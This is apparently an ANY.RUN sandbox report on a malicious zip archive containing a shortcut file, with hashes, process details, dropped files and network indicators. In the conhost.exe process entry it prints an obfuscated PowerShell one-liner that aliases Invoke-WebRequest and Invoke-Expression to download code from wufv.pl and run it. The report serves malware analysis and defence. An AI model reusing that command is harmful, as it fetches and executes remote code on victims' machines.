analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

7866576123.zip

Full analysis: https://app.any.run/tasks/4e2cf22a-0f41-4c73-86a0-567c7cd7ee9e
Verdict: Malicious activity
Analysis date: August 12, 2022, 17:24:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

7F8AF8773D3BB14A2D1695B36C1213B9

SHA1:

46AD8D769F3BB117A9CF6AECD841767B84D82214

SHA256:

C5BB086FCC5FDC440EB75FAE82B3EAC61F15BE4C009F8400C7AAE9387E71D5A5

SSDEEP:

12:5jsOi15SZw3zU1vN0PIH/Ye5Wzdnt1y8YqfaWhJPEAqEalTpnRE33Tmhi15S5aTn:9S5vYvgIH/z5qdt6QgFuzt5v

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Reads the computer name

      • PowerShell_ISE.exe (PID: 2820)
      • WinRAR.exe (PID: 3424)
    • Checks supported languages

      • WinRAR.exe (PID: 3424)
      • PowerShell_ISE.exe (PID: 2820)
    • Reads Environment values

      • PowerShell_ISE.exe (PID: 2820)
  • INFO

    • Checks supported languages

      • WISPTIS.EXE (PID: 2152)
      • conhost.exe (PID: 4068)
    • Manual execution by user

      • conhost.exe (PID: 4068)
      • PowerShell_ISE.exe (PID: 2820)
    • Reads the computer name

      • WISPTIS.EXE (PID: 2152)
    • Reads settings of System Certificates

      • PowerShell_ISE.exe (PID: 2820)
    • Checks Windows Trust Settings

      • PowerShell_ISE.exe (PID: 2820)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 68d4f320edc9e0cf4e33497160ba8b9284aa912dc17e84af050d4fc412e18cdf
ZipUncompressedSize: 1042
ZipCompressedSize: 515
ZipCRC: 0xa7a9cf99
ZipModifyDate: 1980:00:00 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs conhost.exe no specs powershell_ise.exe wisptis.exe no specs wisptis.exe

Process information

PID
CMD
Path
Indicators
Parent process
3424"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\7866576123.zip"C:\Program Files\WinRAR\WinRAR.exeExplorer.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
4068"C:\Windows\system32\conhost.exe" --headless powershell -c $je=$([char](225-120));set-alias a set-alias;a f $je'wr';a np $je'ex'; ;np (f -usebasicparsing 'wufv.pl/h')C:\Windows\system32\conhost.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
3221225485
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imm32.dll
2820"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe" C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe
Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell ISE
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell_ise.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
3148"C:\Windows\SYSTEM32\WISPTIS.EXE" /ManualLaunch;C:\Windows\SYSTEM32\WISPTIS.EXEPowerShell_ISE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Pen and Touch Input Component
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wisptis.exe
c:\windows\system32\ntdll.dll
2152"C:\Windows\SYSTEM32\WISPTIS.EXE" /ManualLaunch;C:\Windows\SYSTEM32\WISPTIS.EXE
PowerShell_ISE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft Pen and Touch Input Component
Exit code:
24
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wisptis.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\ole32.dll
Total events
5 770
Read events
5 675
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
4
Unknown types
1

Dropped files

PID
Process
Filename
Type
3424WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3424.27455\68d4f320edc9e0cf4e33497160ba8b9284aa912dc17e84af050d4fc412e18cdflnk
MD5:AB3B8048B7B159166A26DC9BEA36A51A
SHA256:68D4F320EDC9E0CF4E33497160BA8B9284AA912DC17E84AF050D4FC412E18CDF
2820PowerShell_ISE.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:6CCB2ABD27741AB032EFA176D38CAB9D
SHA256:195A5D3334D395C844E96BD6B15C6879F10C6740154B939FD9D24B5D7B1F77E4
2820PowerShell_ISE.exeC:\Users\admin\AppData\Local\Temp\svb0pi32.at5.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2820PowerShell_ISE.exeC:\Users\admin\AppData\Local\Temp\gcx4wuq4.nhs.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2820PowerShell_ISE.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ISE\S-1-5-5-0-91366\PowerShellISEPipeName_0_b90a6b28-4346-4e85-abda-37887231a98dtext
MD5:A5EA0AD9260B1550A14CC58D2C39B03D
SHA256:F1B2F662800122BED0FF255693DF89C4487FBDCF453D3524A42D4EC20C3D9C04
2820PowerShell_ISE.exeC:\Users\admin\AppData\Local\Temp\tmpCFA5.tmpimage
MD5:F04A2805F60770668268454EDFC499FA
SHA256:AB3A68D162953659E8C02DBD5C13121DF9DB824D404824450FD38134E32F5ADF
2820PowerShell_ISE.exeC:\Users\admin\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\awb3flqu.tmptext
MD5:7FFA55FF6AC84742FC67B49B83BE3F12
SHA256:786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB
2820PowerShell_ISE.exeC:\Users\admin\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\2820.xmltext
MD5:7FFA55FF6AC84742FC67B49B83BE3F12
SHA256:786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2820
PowerShell_ISE.exe
GET
198.199.91.178:80
http://wufv.pl/h.jpg
US
unknown
2820
PowerShell_ISE.exe
GET
198.199.91.178:80
http://wufv.pl/h
US
unknown
2820
PowerShell_ISE.exe
GET
198.199.91.178:80
http://wufv.pl/h
US
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2820
PowerShell_ISE.exe
198.199.91.178:80
wufv.pl
Digital Ocean, Inc.
US
unknown

DNS requests

Domain
IP
Reputation
wufv.pl
  • 198.199.91.178
unknown

Threats

PID
Process
Class
Message
2820
PowerShell_ISE.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2820
PowerShell_ISE.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2820
PowerShell_ISE.exe
Generic Protocol Command Decode
SURICATA STREAM CLOSEWAIT FIN out of window
No debug info